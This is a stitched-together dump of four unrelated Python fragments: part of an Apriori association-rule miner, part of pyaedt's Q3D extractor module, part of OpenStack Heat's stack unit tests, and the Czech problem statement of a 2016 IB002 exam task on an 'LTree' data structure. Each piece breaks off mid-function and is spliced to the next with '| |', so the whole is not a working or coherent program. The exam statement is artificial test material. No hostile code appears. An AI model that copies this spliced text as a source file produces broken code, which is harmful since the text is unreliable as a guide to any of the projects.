Ck = apriori_gen(F[k-2], k) # generate candidate itemsets
Fk, supK = support_prune(D, Ck, min_support) # prune candidate itemsets
support_data.update(supK) # update the support counts to reflect pruning
F.append(Fk) # add the pruned candidate itemsets to the list of frequent itemsets
k += 1
if verbose:
# Print a list of all the frequent itemsets.
for kset in F:
for item in kset:
print(("" \
+ "{" \
+ "".join(str(i) + ", " for i in iter(item)).rstrip(', ') \
+ "}" \
+ ": sup = " + str(round(support_data[item], 3))))
return F, support_data
def create_candidates(dataset, verbose=False):
"""Creates a list of candidate 1-itemsets from a list of transactions.
Parameters
----------
dataset : list
The dataset (a list of transactions) from which to generate candidate
itemsets.
Returns
-------
The list of candidate itemsets (c1) passed as a frozenset (a set that is
immutable and hashable).
"""
c1 = [] # list of all items in the database of transactions
for transaction in dataset:
for item in transaction:
if not [item] in c1:
c1.append([item])
c1.sort()
if verbose:
# Print a list of all the candidate items.
print(("" \
+ "{" \
+ "".join(str(i[0]) + ", " for i in iter(c1)).rstrip(', ') \
+ "}"))
# Map c1 to a frozenset because it will be the key of a dictionary.
return list(map(frozenset, c1))
def support_prune(dataset, candidates, min_support, verbose=False):
"""Returns all candidate itemsets that meet a minimum support threshold.
By the apriori principle, if an itemset is frequent, then all of its
subsets must also be frequent. As a result, we can perform support-based
pruning to systematically control the exponential growth of candidate
itemsets. Thus, itemsets that do not meet the minimum support level are
pruned from the input list of itemsets (dataset).
Parameters
----------
dataset : list
The dataset (a list of transactions) from which to generate candidate
itemsets.
candidates : frozenset
The list of candidate itemsets.
min_support : float
The minimum support threshold.
Returns
-------
retlist : list
The list of frequent itemsets.
support_data : dict
The support data for all candidate itemsets.
"""
sscnt = {} # set for support counts
for tid in dataset:
for can in candidates:
if can.issubset(tid):
sscnt.setdefault(can, 0)
sscnt[can] += 1
num_items = float(len(dataset)) # total number of transactions in the dataset
retlist = [] # array for unpruned itemsets
support_data = {} # set for support data for corresponding itemsets
for key in sscnt:
# Calculate the support of itemset key.
support = sscnt[key] / num_items
if support >= min_support:
retlist.insert(0, key)
support_data[key] = support
# Print a list of the pruned itemsets.
if verbose:
for kset in retlist:
for item in kset:
print(("{" + str(item) + "}"))
print("")
for key in sscnt:
print(("" \
+ "{" \
+ "".join([str(i) + ", " for i in iter(key)]).rstrip(', ') \
+ "}" \
+ ": sup = " + str(support_data[key])))
return retlist, support_data
def apriori_gen(freq_sets, k):
"""Generates candidate itemsets (via the F_k-1 x F_k-1 method).
This operation generates new candidate k-itemsets based on the frequent
(k-1)-itemsets found in the previous iteration. The candidate generation
procedure merges a pair of frequent (k-1)-itemsets only if their first k-2
items are identical.
Parameters
----------
freq_sets : list
The list of frequent (k-1)-itemsets.
k : integer
The cardinality of the current itemsets being evaluated.
Returns
-------
retlist : list
The list of merged frequent itemsets.
"""
retList = [] # list of merged frequent itemsets
lenLk = len(freq_sets) # number of frequent itemsets
for i in range(lenLk):
for j in range(i+1, lenLk):
a=list(freq_sets[i])
b=list(freq_sets[j])
a.sort()
b.sort()
F1 = a[:k-2] # first k-2 items of freq_sets[i]
F2 = b[:k-2] # first k-2 items of freq_sets[j]
if F1 == F2: # if the first k-2 items are identical
# Merge the frequent itemsets.
retList.append(freq_sets[i] | freq_sets[j])
return retList
def rules_from_conseq(freq_set, H, support_data, rules, min_confidence=0.5, verbose=False):
"""Generates a set of candidate rules.
Parameters
----------
freq_set : frozenset
The complete list of frequent itemsets.
H : list
A list of frequent itemsets (of a particular length).
support_data : dict
The support data for all candidate itemsets.
rules : list
A potentially incomplete set of candidate rules above the minimum
confidence threshold.
min_confidence : float
The minimum confidence threshold. Defaults to 0.5.
"""
m = len(H[0])
if m == 1:
Hmp1 = calc_confidence(freq_set, H, support_data, rules, min_confidence, verbose)
if (len(freq_set) > (m+1)):
Hmp1 = apriori_gen(H, m+1) # generate candidate itemsets
Hmp1 = calc_confidence(freq_set, Hmp1, support_data, rules, min_confidence, verbose)
if len(Hmp1) > 1:
# If there are candidate rules above the minimum confidence
# threshold, recurse on the list of these candidate rules.
rules_from_conseq(freq_set, Hmp1, support_data, rules, min_confidence, verbose)
def calc_confidence(freq_set, H, support_data, rules, min_confidence=0.5, verbose=False):
"""Evaluates the generated rules.
One measurement for quantifying the goodness of association rules is
confidence. The confidence for a rule 'P implies H' (P -> H) is defined as
the support for P and H divided by the support for P
(support (P|H) / support(P)), where the | symbol denotes the set union
(thus P|H means all the items in set P or in set H).
To calculate the confidence, we iterate through the frequent itemsets and
associated support data. For each frequent itemset, we divide the support
of the itemset by the support of the antecedent (left-hand-side of the
rule).
Parameters
----------
freq_set : frozenset
The complete list of frequent itemsets.
H : list
A list of frequent itemsets (of a particular length).
min_support : float
The minimum support threshold.
rules : list
A potentially incomplete set of candidate rules above the minimum
confidence threshold.
min_confidence : float
The minimum confidence threshold. Defaults to 0.5.
Returns
-------
pruned_H : list
The list of candidate rules above the | |
<filename>pyaedt/q3d.py
"""This module contains these classes: ``Q2d``, ``Q3d``, and ``QExtractor`."""
from __future__ import absolute_import # noreorder
import os
import warnings
from collections import OrderedDict
from pyaedt.application.Analysis3D import FieldAnalysis3D
from pyaedt.generic.constants import MATRIXOPERATIONSQ2D
from pyaedt.generic.constants import MATRIXOPERATIONSQ3D
from pyaedt.generic.general_methods import generate_unique_name
from pyaedt.generic.general_methods import pyaedt_function_handler
from pyaedt.modules.Boundary import BoundaryObject
from pyaedt.modules.Boundary import Matrix
class QExtractor(FieldAnalysis3D, object):
"""Extracts a 2D or 3D field analysis.
Parameters
----------
FieldAnalysis3D :
FieldAnalysis2D :
object :
"""
@property
def design_file(self):
"""Design file."""
design_file = os.path.join(self.working_directory, "design_data.json")
return design_file
def __init__(
self,
Q3DType,
projectname=None,
designname=None,
solution_type=None,
setup_name=None,
specified_version=None,
non_graphical=False,
new_desktop_session=False,
close_on_exit=False,
student_version=False,
machine="",
port=0,
aedt_process_id=None,
):
FieldAnalysis3D.__init__(
self,
Q3DType,
projectname,
designname,
solution_type,
setup_name,
specified_version,
non_graphical,
new_desktop_session,
close_on_exit,
student_version,
machine,
port,
aedt_process_id,
)
self.matrices = []
for el in list(self.omatrix.ListReduceMatrixes()):
self.matrices.append(Matrix(self, el))
def __enter__(self):
return self
@property
def excitations(self):
"""Get all excitation names.
Returns
-------
list
List of excitation names. Excitations with multiple modes will return one
excitation for each mode.
"""
return self.matrices[0].sources(False)
@pyaedt_function_handler()
def insert_reduced_matrix(self, operation_name, source_names=None, rm_name=None):
"""Insert a new reduced matrix.
Parameters
----------
operation_name : str
Name of the operation to create.
source_names : list, str, optional
List of sources or nets or arguments needed for the operation. The default
is ``None``.
rm_name : str, optional
Name of the reduced matrix The default is ``None``.
Returns
-------
:class:`pyaedt.modules.Boundary.Matrix`
Matrix object.
"""
if not rm_name:
rm_name = generate_unique_name(operation_name)
matrix = Matrix(self, rm_name, operation_name)
if matrix.create(source_names):
self.matrices.append(matrix)
return matrix
@pyaedt_function_handler()
def get_traces_for_plot(
self,
get_self_terms=True,
get_mutual_terms=True,
first_element_filter=None,
second_element_filter=None,
category="C",
):
"""Retrieve a list of traces of specified designs ready to use in plot reports.
Parameters
----------
get_self_terms : bool, optional
Whether to return self terms. The default is ``True``.
get_mutual_terms : bool, optional
Whether to return mutual terms. The default is ``True``.
first_element_filter : str, optional
Filter to apply to the first element of the equation.
This parameter accepts ``*`` and ``?`` as special characters. The default is ``None``.
second_element_filter : str, optional
Filter to apply to the second element of the equation.
This parameter accepts ``*`` and ``?`` as special characters. The default is ``None``.
category : str
Plot category name as in the report (including operator).
The default is ``"C"``, which is the plot category name for capacitance.
Returns
-------
list
Traces of specified designs ready to use in plot reports.
Examples
--------
>>> from pyaedt import Q3d
>>> hfss = Q3d(project_path)
>>> hfss.get_traces_for_plot(first_element_filter="Bo?1",
... second_element_filter="GND*", category="C")
"""
return self.matrices[0].get_sources_for_plot(
get_self_terms=get_self_terms,
get_mutual_terms=get_mutual_terms,
first_element_filter=first_element_filter,
second_element_filter=second_element_filter,
category=category,
)
@pyaedt_function_handler()
def export_mesh_stats(self, setup_name, variation_string="", mesh_path=None, setup_type="CG"):
"""Export mesh statistics to a file.
Parameters
----------
setup_name :str
Setup name.
variation_string : str, optional
Variation list. The default is ``""``.
mesh_path : str, optional
Full path to the mesh statistics file. The default is ``None``, in which
caswe the working directory is used.
setup_type : str, optional
Setup type in Q3D. The default is "CG", other options are "AC RL" or "DC RL".
Returns
-------
str
File path.
References
----------
>>> oDesign.ExportMeshStats
"""
if not mesh_path:
mesh_path = os.path.join(self.working_directory, "meshstats.ms")
self.odesign.ExportMeshStats(setup_name, variation_string, setup_type, mesh_path)
return mesh_path
class Q3d(QExtractor, object):
"""Provides the Q3D application interface.
This class allows you to create an instance of Q3D and link to an
existing project or create a new one.
Parameters
----------
projectname : str, optional
Name of the project to select or the full path to the project
or AEDTZ archive to open. The default is ``None``, in which
case an attempt is made to get an active project. If no
projects are present, an empty project is created.
designname : str, optional
Name of the design to select. The default is ``None``, in
which case an attempt is made to get an active design. If no
designs are present, an empty design is created.
solution_type : str, optional
Solution type to apply to the design. The default is
``None``, in which case the default type is applied.
setup_name : str, optional
Name of the setup to use as the nominal. The default is
``None``, in which case the active setup is used or nothing
is used.
specified_version : str, optional
Version of AEDT to use. The default is ``None``, in which case
the active version or latest installed version is used.
This parameter is ignored when Script is launched within AEDT.
non_graphical : bool, optional
Whether to launch AEDT in non-graphical mode. The default
is ``False``, in which case AEDT is launched in graphical mode.
This parameter is ignored when a script is launched within AEDT.
new_desktop_session : bool, optional
Whether to launch an instance of AEDT in a new thread, even if
another instance of the ``specified_version`` is active on the
machine. The default is ``True``. This parameter is ignored when Script is launched within AEDT.
close_on_exit : bool, optional
Whether to release AEDT on exit. The default is ``False``.
student_version : bool, optional
Whether to open the AEDT student version. The default is ``False``.
This parameter is ignored when Script is launched within AEDT.
machine : str, optional
Machine name to which connect the oDesktop Session. Works only on 2022R2.
Remote Server must be up and running with command `"ansysedt.exe -grpcsrv portnum"`.
If machine is `"localhost"` the server will also start if not present.
port : int, optional
Port number of which start the oDesktop communication on already existing server.
This parameter is ignored in new server creation. It works only on 2022R2.
Remote Server must be up and running with command `"ansysedt.exe -grpcsrv portnum"`.
aedt_process_id : int, optional
Only used when ``new_desktop_session = False``, specifies by process ID which instance
of Electronics Desktop to point PyAEDT at.
Examples
--------
Create an instance of Q3D and connect to an existing Q3D
design or create a new Q3D design if one does not exist.
>>> from pyaedt import Q3d
>>> app = Q3d()
"""
def __init__(
self,
projectname=None,
designname=None,
solution_type=None,
setup_name=None,
specified_version=None,
non_graphical=False,
new_desktop_session=False,
close_on_exit=False,
student_version=False,
machine="",
port=0,
aedt_process_id=None,
):
QExtractor.__init__(
self,
"Q3D Extractor",
projectname,
designname,
solution_type,
setup_name,
specified_version,
non_graphical,
new_desktop_session,
close_on_exit,
student_version,
machine,
port,
aedt_process_id,
)
self.MATRIXOPERATIONS = MATRIXOPERATIONSQ3D()
@property
def nets(self):
"""Return the list of available nets in a Q3D project.
Returns
-------
list
References
----------
>>> oModule.ListNets
"""
nets_data = list(self.oboundary.ListNets())
net_names = []
for i in nets_data:
if isinstance(i, (list, tuple)):
net_names.append(i[0].split(":")[1])
return net_names
@pyaedt_function_handler()
def net_sources(self, net_name):
"""Check if a net has sources and return a list of source names.
Parameters
----------
net_name : str
Name of the net to search for.
Returns
-------
List
List of source names.
Examples
--------
>>> from pyaedt import Q3d
>>> q3d = Q3d("my_project")
>>> net = q3d.net_sources("Net1")
"""
sources = []
net_id = -1
for i in self.boundaries:
if i.type == "SignalNet" and i.name == net_name and i.props.get("ID", None) is not None:
net_id = i.props.get("ID", None) # pragma: no cover
break # pragma: no cover
for i in self.boundaries:
if i.type == "Source":
if i.props.get("Net", None) == net_name or i.props.get("Net", None) == net_id:
sources.append(i.name)
return sources
@pyaedt_function_handler()
def net_sinks(self, net_name):
"""Check if a net has sinks and returns a list of sink names.
Parameters
----------
net_name : str
Name of the net to search for.
Returns
-------
List
List of sink names.
Examples
--------
>>> from pyaedt import Q3d
>>> q3d = Q3d("my_project")
>>> net = q3d.net_sinks("Net1")
"""
sinks = []
net_id = -1
for i in self.boundaries:
if i.type == "SignalNet" and i.name == net_name and i.props.get("ID", None) is not None:
net_id = i.props.get("ID", None) # pragma: no cover
break # pragma: no cover
for i in self.boundaries:
if i.type == "Sink" and i.props.get("Net", None) == net_name or i.props.get("Net", None) == net_id:
sinks.append(i.name)
return sinks
@pyaedt_function_handler()
def auto_identify_nets(self):
"""Automatically identify nets.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oModule.AutoIdentifyNets
"""
original_nets = [i for i in self.nets]
self.oboundary.AutoIdentifyNets()
new_nets = [i for i in self.nets if i not in original_nets]
for net in new_nets:
objects = self.modeler.convert_to_selections(
[int(i) | |
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import copy
import datetime
import json
import logging
import time
import eventlet
import fixtures
import mock
import mox
from oslo_config import cfg
import six
from heat.common import context
from heat.common import exception
from heat.common import template_format
from heat.common import timeutils
from heat.db.sqlalchemy import api as db_api
from heat.engine.clients.os import keystone
from heat.engine.clients.os.keystone import fake_keystoneclient as fake_ks
from heat.engine.clients.os import nova
from heat.engine import environment
from heat.engine import function
from heat.engine import node_data
from heat.engine import resource
from heat.engine import scheduler
from heat.engine import service
from heat.engine import stack
from heat.engine import stk_defn
from heat.engine import template
from heat.engine import update
from heat.objects import raw_template as raw_template_object
from heat.objects import resource as resource_objects
from heat.objects import stack as stack_object
from heat.objects import stack_tag as stack_tag_object
from heat.objects import user_creds as ucreds_object
from heat.tests import common
from heat.tests import fakes
from heat.tests import generic_resource as generic_rsrc
from heat.tests import utils
empty_template = template_format.parse('''{
"HeatTemplateFormatVersion" : "2012-12-12",
}''')
class StackTest(common.HeatTestCase):
def setUp(self):
super(StackTest, self).setUp()
self.tmpl = template.Template(copy.deepcopy(empty_template))
self.ctx = utils.dummy_context()
self.stub_auth()
def test_stack_reads_tenant(self):
self.stack = stack.Stack(self.ctx, 'test_stack', self.tmpl,
tenant_id='bar')
self.assertEqual('bar', self.stack.tenant_id)
def test_stack_reads_tenant_from_context_if_empty(self):
self.ctx.tenant = 'foo'
self.stack = stack.Stack(self.ctx, 'test_stack', self.tmpl,
tenant_id=None)
self.assertEqual('foo', self.stack.tenant_id)
def test_stack_reads_username(self):
self.stack = stack.Stack(self.ctx, 'test_stack', self.tmpl,
username='bar')
self.assertEqual('bar', self.stack.username)
def test_stack_reads_username_from_context_if_empty(self):
self.ctx.username = 'foo'
self.stack = stack.Stack(self.ctx, 'test_stack', self.tmpl,
username=None)
self.assertEqual('foo', self.stack.username)
def test_stack_string_repr(self):
self.stack = stack.Stack(self.ctx, 'test_stack', self.tmpl)
expected = 'Stack "%s" [%s]' % (self.stack.name, self.stack.id)
observed = str(self.stack)
self.assertEqual(expected, observed)
def test_state_defaults(self):
self.stack = stack.Stack(self.ctx, 'test_stack', self.tmpl)
self.assertEqual(('CREATE', 'IN_PROGRESS'), self.stack.state)
self.assertEqual('', self.stack.status_reason)
def test_timeout_secs_default(self):
cfg.CONF.set_override('stack_action_timeout', 1000)
self.stack = stack.Stack(self.ctx, 'test_stack', self.tmpl)
self.assertIsNone(self.stack.timeout_mins)
self.assertEqual(1000, self.stack.timeout_secs())
def test_timeout_secs(self):
self.stack = stack.Stack(self.ctx, 'test_stack', self.tmpl,
timeout_mins=10)
self.assertEqual(600, self.stack.timeout_secs())
@mock.patch.object(stack, 'oslo_timeutils')
def test_time_elapsed(self, mock_tu):
self.stack = stack.Stack(self.ctx, 'test_stack', self.tmpl)
# dummy create time 10:00:00
self.stack.created_time = datetime.datetime(2015, 7, 27, 10, 0, 0)
# mock utcnow set to 10:10:00 (600s offset)
mock_tu.utcnow.return_value = datetime.datetime(2015, 7, 27, 10, 10, 0)
self.assertEqual(600, self.stack.time_elapsed())
@mock.patch.object(stack, 'oslo_timeutils')
def test_time_elapsed_negative(self, mock_tu):
self.stack = stack.Stack(self.ctx, 'test_stack', self.tmpl)
# dummy create time 10:00:00
self.stack.created_time = datetime.datetime(2015, 7, 27, 10, 0, 0)
# mock utcnow set to 09:59:50 (-10s offset)
mock_tu.utcnow.return_value = datetime.datetime(2015, 7, 27, 9, 59, 50)
self.assertEqual(-10, self.stack.time_elapsed())
@mock.patch.object(stack, 'oslo_timeutils')
def test_time_elapsed_ms(self, mock_tu):
self.stack = stack.Stack(self.ctx, 'test_stack', self.tmpl)
# dummy create time 10:00:00
self.stack.created_time = datetime.datetime(2015, 7, 27, 10, 5, 0)
# mock utcnow set to microsecond offset
mock_tu.utcnow.return_value = datetime.datetime(2015, 7, 27,
10, 4, 59, 750000)
self.assertEqual(-0.25, self.stack.time_elapsed())
@mock.patch.object(stack, 'oslo_timeutils')
def test_time_elapsed_with_updated_time(self, mock_tu):
self.stack = stack.Stack(self.ctx, 'test_stack', self.tmpl)
# dummy create time 10:00:00
self.stack.created_time = datetime.datetime(2015, 7, 27, 10, 0, 0)
# dummy updated time 11:00:00; should consider this not created_time
self.stack.updated_time = datetime.datetime(2015, 7, 27, 11, 0, 0)
# mock utcnow set to 11:10:00 (600s offset)
mock_tu.utcnow.return_value = datetime.datetime(2015, 7, 27, 11, 10, 0)
self.assertEqual(600, self.stack.time_elapsed())
@mock.patch.object(stack.Stack, 'time_elapsed')
def test_time_remaining(self, mock_te):
self.stack = stack.Stack(self.ctx, 'test_stack', self.tmpl)
# mock time elapsed; set to 600 seconds
mock_te.return_value = 600
# default stack timeout is 3600 seconds; remaining time 3000 secs
self.assertEqual(3000, self.stack.time_remaining())
@mock.patch.object(stack.Stack, 'time_elapsed')
def test_has_timed_out(self, mock_te):
self.stack = stack.Stack(self.ctx, 'test_stack', self.tmpl)
self.stack.status = self.stack.IN_PROGRESS
# test with timed out stack
mock_te.return_value = 3601
# default stack timeout is 3600 seconds; stack should time out
self.assertTrue(self.stack.has_timed_out())
# mock time elapsed; set to 600 seconds
mock_te.return_value = 600
# default stack timeout is 3600 seconds; remaining time 3000 secs
self.assertFalse(self.stack.has_timed_out())
# has_timed_out has no meaning when stack completes/fails;
# should return false
self.stack.status = self.stack.COMPLETE
self.assertFalse(self.stack.has_timed_out())
self.stack.status = self.stack.FAILED
self.assertFalse(self.stack.has_timed_out())
def test_no_auth_token(self):
ctx = utils.dummy_context()
ctx.auth_token = None
self.stack = stack.Stack(ctx, 'test_stack', self.tmpl)
self.assertEqual('abcd1234',
ctx.auth_plugin.auth_token)
def test_state_deleted(self):
self.stack = stack.Stack(self.ctx, 'test_stack', self.tmpl,
action=stack.Stack.CREATE,
status=stack.Stack.IN_PROGRESS)
self.stack.id = '1234'
self.stack.delete()
self.assertIsNone(self.stack.state_set(stack.Stack.CREATE,
stack.Stack.COMPLETE,
'test'))
def test_load_nonexistant_id(self):
self.assertRaises(exception.NotFound, stack.Stack.load,
self.ctx, -1)
def test_total_resources_empty(self):
self.stack = stack.Stack(self.ctx, 'test_stack', self.tmpl,
status_reason='flimflam')
self.stack.store()
self.assertEqual(0, self.stack.total_resources(self.stack.id))
self.assertEqual(0, self.stack.total_resources())
@mock.patch.object(db_api, 'stack_count_total_resources')
def test_total_resources_not_stored(self, sctr):
self.stack = stack.Stack(self.ctx, 'test_stack', self.tmpl,
status_reason='flimflam')
self.assertEqual(0, self.stack.total_resources())
sctr.assert_not_called()
def test_total_resources_not_found(self):
self.stack = stack.Stack(self.ctx, 'test_stack', self.tmpl,
status_reason='flimflam')
self.assertEqual(0, self.stack.total_resources('1234'))
@mock.patch.object(db_api, 'stack_count_total_resources')
def test_total_resources_generic(self, sctr):
tpl = {'HeatTemplateFormatVersion': '2012-12-12',
'Resources':
{'A': {'Type': 'GenericResourceType'}}}
self.stack = stack.Stack(self.ctx, 'test_stack',
template.Template(tpl),
status_reason='blarg')
self.stack.store()
sctr.return_value = 1
self.assertEqual(1, self.stack.total_resources(self.stack.id))
self.assertEqual(1, self.stack.total_resources())
def test_resource_get(self):
tpl = {'HeatTemplateFormatVersion': '2012-12-12',
'Resources':
{'A': {'Type': 'GenericResourceType'}}}
self.stack = stack.Stack(self.ctx, 'test_stack',
template.Template(tpl),
status_reason='blarg')
self.stack.store()
self.assertEqual('A', self.stack.resource_get('A').name)
self.assertEqual(self.stack['A'], self.stack.resource_get('A'))
self.assertIsNone(self.stack.resource_get('B'))
@mock.patch.object(resource_objects.Resource, 'get_all_by_stack')
def test_resource_get_db_fallback(self, gabs):
tpl = {'HeatTemplateFormatVersion': '2012-12-12',
'Resources':
{'A': {'Type': 'GenericResourceType'}}}
self.stack = stack.Stack(self.ctx, 'test_stack',
template.Template(tpl),
status_reason='blarg')
self.stack.store()
tpl2 = {'HeatTemplateFormatVersion': '2012-12-12',
'Resources':
{'A': {'Type': 'GenericResourceType'},
'B': {'Type': 'GenericResourceType'}}}
t2 = template.Template(tpl2)
t2.store(self.ctx)
db_resources = {
'A': mock.MagicMock(),
'B': mock.MagicMock(current_template_id=t2.id),
'C': mock.MagicMock(current_template_id=t2.id)
}
db_resources['A'].name = 'A'
db_resources['B'].name = 'B'
db_resources['C'].name = 'C'
gabs.return_value = db_resources
self.assertEqual('A', self.stack.resource_get('A').name)
self.assertEqual('B', self.stack.resource_get('B').name)
# Ignore the resource if only in db
self.assertIsNone(self.stack.resource_get('C'))
self.assertIsNone(self.stack.resource_get('D'))
@mock.patch.object(resource_objects.Resource, 'get_all_by_stack')
def test_iter_resources(self, mock_db_call):
tpl = {'HeatTemplateFormatVersion': '2012-12-12',
'Resources':
{'A': {'Type': 'GenericResourceType'},
'B': {'Type': 'GenericResourceType'}}}
self.stack = stack.Stack(self.ctx, 'test_stack',
template.Template(tpl),
status_reason='blarg')
self.stack.store()
mock_rsc_a = mock.MagicMock(current_template_id=self.stack.t.id)
mock_rsc_a.name = 'A'
mock_rsc_b = mock.MagicMock(current_template_id=self.stack.t.id)
mock_rsc_b.name = 'B'
mock_db_call.return_value = {
'A': mock_rsc_a,
'B': mock_rsc_b
}
all_resources = list(self.stack.iter_resources())
# Verify, the db query is called with expected filter
mock_db_call.assert_called_once_with(self.ctx, self.stack.id)
# And returns the resources
names = sorted([r.name for r in all_resources])
self.assertEqual(['A', 'B'], names)
@mock.patch.object(resource_objects.Resource, 'get_all_by_stack')
def test_iter_resources_with_nested(self, mock_db_call):
tpl = {'HeatTemplateFormatVersion': '2012-12-12',
'Resources':
{'A': {'Type': 'StackResourceType'},
'B': {'Type': 'GenericResourceType'}}}
self.stack = stack.Stack(self.ctx, 'test_stack',
template.Template(tpl),
status_reason='blarg')
self.stack.store()
mock_rsc_a = mock.MagicMock(current_template_id=self.stack.t.id)
mock_rsc_a.name = 'A'
mock_rsc_b = mock.MagicMock(current_template_id=self.stack.t.id)
mock_rsc_b.name = 'B'
mock_db_call.return_value = {
'A': mock_rsc_a,
'B': mock_rsc_b
}
def get_more(nested_depth=0, filters=None):
yield 'X'
yield 'Y'
yield 'Z'
mock_nested = self.patchobject(generic_rsrc.StackResourceType,
'nested')
mock_nested.return_value.iter_resources = mock.MagicMock(
side_effect=get_more)
resource_generator = self.stack.iter_resources()
self.assertIsNot(resource_generator, list)
first_level_resources = list(resource_generator)
self.assertEqual(2, len(first_level_resources))
all_resources = list(self.stack.iter_resources(1))
self.assertEqual(5, len(all_resources))
@mock.patch.object(resource_objects.Resource, 'get_all_by_stack')
def test_iter_resources_with_filters(self, mock_db_call):
tpl = {'HeatTemplateFormatVersion': '2012-12-12',
'Resources':
{'A': {'Type': 'GenericResourceType'},
'B': {'Type': 'GenericResourceType'}}}
self.stack = stack.Stack(self.ctx, 'test_stack',
template.Template(tpl),
status_reason='blarg')
self.stack.store()
mock_rsc = mock.MagicMock()
mock_rsc.name = 'A'
mock_rsc.current_template_id = self.stack.t.id
mock_db_call.return_value = {'A': mock_rsc}
all_resources = list(self.stack.iter_resources(
filters=dict(name=['A'])
))
# Verify, the db query is called with expected filter
mock_db_call.assert_has_calls([
mock.call(self.ctx, self.stack.id, dict(name=['A'])),
mock.call(self.ctx, self.stack.id),
])
# Make sure it returns only one resource.
self.assertEqual(1, len(all_resources))
# And returns the resource A
self.assertEqual('A', all_resources[0].name)
@mock.patch.object(resource_objects.Resource, 'get_all_by_stack')
def test_iter_resources_with_nonexistent_template(self, mock_db_call):
tpl = {'HeatTemplateFormatVersion': '2012-12-12',
'Resources':
{'A': {'Type': 'GenericResourceType'},
'B': {'Type': 'GenericResourceType'}}}
self.stack = stack.Stack(self.ctx, 'test_stack',
template.Template(tpl),
status_reason='blarg')
self.stack.store()
mock_rsc_a = mock.MagicMock(current_template_id=self.stack.t.id)
mock_rsc_a.name = 'A'
mock_rsc_b = mock.MagicMock(current_template_id=self.stack.t.id + 1)
mock_rsc_b.name = 'B'
mock_db_call.return_value = {
'A': mock_rsc_a,
'B': mock_rsc_b
}
all_resources = list(self.stack.iter_resources())
self.assertEqual(1, len(all_resources))
@mock.patch.object(resource_objects.Resource, 'get_all_by_stack')
def test_iter_resources_nested_with_filters(self, mock_db_call):
tpl = {'HeatTemplateFormatVersion': '2012-12-12',
'Resources':
{'A': {'Type': 'StackResourceType'},
'B': {'Type': 'GenericResourceType'}}}
self.stack = stack.Stack(self.ctx, 'test_stack',
template.Template(tpl),
status_reason='blarg')
self.stack.store()
mock_rsc_a = mock.MagicMock(current_template_id=self.stack.t.id)
mock_rsc_a.name = 'A'
mock_rsc_b = mock.MagicMock(current_template_id=self.stack.t.id)
mock_rsc_b.name = 'B'
mock_db_call.return_value = {
'A': mock_rsc_a,
'B': mock_rsc_b
}
def get_more(nested_depth=0, filters=None):
if filters:
yield 'X'
mock_nested = self.patchobject(generic_rsrc.StackResourceType,
'nested')
mock_nested.return_value.iter_resources = mock.MagicMock(
side_effect=get_more)
all_resources = list(self.stack.iter_resources(
nested_depth=1,
filters=dict(name=['A'])
))
# Verify, the db query is called with expected filter
mock_db_call.assert_has_calls([
mock.call(self.ctx, self.stack.id, dict(name=['A'])),
mock.call(self.ctx, self.stack.id),
])
# Returns three resources (1 first level + 2 second level)
self.assertEqual(3, len(all_resources))
def test_load_parent_resource(self):
self.stack = stack.Stack(self.ctx, 'load_parent_resource', self.tmpl,
parent_resource='parent')
self.stack.store()
stk = stack_object.Stack.get_by_id(self.ctx, self.stack.id)
t = template.Template.load(self.ctx, stk.raw_template_id)
self.m.StubOutWithMock(template.Template, 'load')
template.Template.load(
self.ctx, stk.raw_template_id, stk.raw_template
).AndReturn(t)
self.m.StubOutWithMock(stack.Stack, '__init__')
stack.Stack.__init__(self.ctx, stk.name, t, stack_id=stk.id,
action=stk.action, status=stk.status,
status_reason=stk.status_reason,
timeout_mins=stk.timeout,
disable_rollback=stk.disable_rollback,
parent_resource='parent', owner_id=None,
stack_user_project_id=None,
created_time=mox.IgnoreArg(),
updated_time=None,
user_creds_id=stk.user_creds_id,
tenant_id='test_tenant_id',
use_stored_context=False,
username=mox.IgnoreArg(),
convergence=False,
current_traversal=self.stack.current_traversal,
prev_raw_template_id=None,
current_deps=None, cache_data=None,
nested_depth=0,
deleted_time=None)
self.m.ReplayAll()
stack.Stack.load(self.ctx, stack_id=self.stack.id)
self.m.VerifyAll()
def test_identifier(self):
self.stack = stack.Stack(self.ctx, 'identifier_test', self.tmpl)
self.stack.store()
identifier = self.stack.identifier()
self.assertEqual(self.stack.tenant_id, identifier.tenant)
self.assertEqual('identifier_test', identifier.stack_name)
self.assertTrue(identifier.stack_id)
self.assertFalse(identifier.path)
def test_get_stack_abandon_data(self):
tpl = {'HeatTemplateFormatVersion': '2012-12-12',
'Parameters': {'param1': {'Type': 'String'}},
'Resources':
{'A': {'Type': 'GenericResourceType'},
'B': {'Type': 'GenericResourceType'}}}
resources = '''{"A": {"status": "COMPLETE", "name": "A",
"resource_data": {}, "resource_id": null, "action": "INIT",
"type": "GenericResourceType", "metadata": {}},
"B": {"status": "COMPLETE", "name": "B", "resource_data": {},
"resource_id": null, "action": "INIT", "type": | |
from __future__ import print_function #kompatibilita s Python 2.7
import sys
# Implementacni test IB002 2016 - LTree (max 50 bodu)
#
# Vasi ulohou je implementovat ctyri funkce pro datovou strukturou "LTree".
# Muzete si samozrejme pridat vlastni pomocne funkce.
#
# LTree je datova struktura, ktera slouzi k ukladani klicu typu integer.
# Pro jednoduchost budeme v teto uloze predpokladat, ze klice jsou unikatni,
# tj. pokud je ve strukture ulozen nejaky klic, tak zadny jiny klic nema
# stejnou hodnotu, a to ani v jinem strome (v uloze 4).
#
# LTree je binarni strom, ktery ma v kazdem uzlu ulozeny klic 'key' a navic
# pomocnou hodnotu 'S'. LTree musi splnovat nasledujici vlastnosti:
#
# - Klic uzlu musi byt vzdy mensi nez klice jeho synu.
#
# - Hodnota 'S' je vzdalenost k nejblizsimu "None nasledniku" ve svem podstrome.
# - List (oba synove jsou 'None') ma hodnotu 'S' rovnu 1.
# - Uzel s jednim synem (druhy je tedy 'None') ma hodnotu 'S' rovnu 1.
#
# - Hodnota 'S' leveho syna musi byt vetsi nebo rovna hodnote 'S' praveho syna.
# - Uzel s jednim synem ma jen leveho syna.
#
# Prazdny strom je tedy take LTree.
#
# Jenoduche priklady (vypsane hodnoty jsou klice):
# jsou LTree nejsou LTree
# 1 4 4 2
# / \ / / \
# 2 3 7 2 4
#
# Pro slozitejsi ukazky se muzete podivat do prilozeneho pdf.
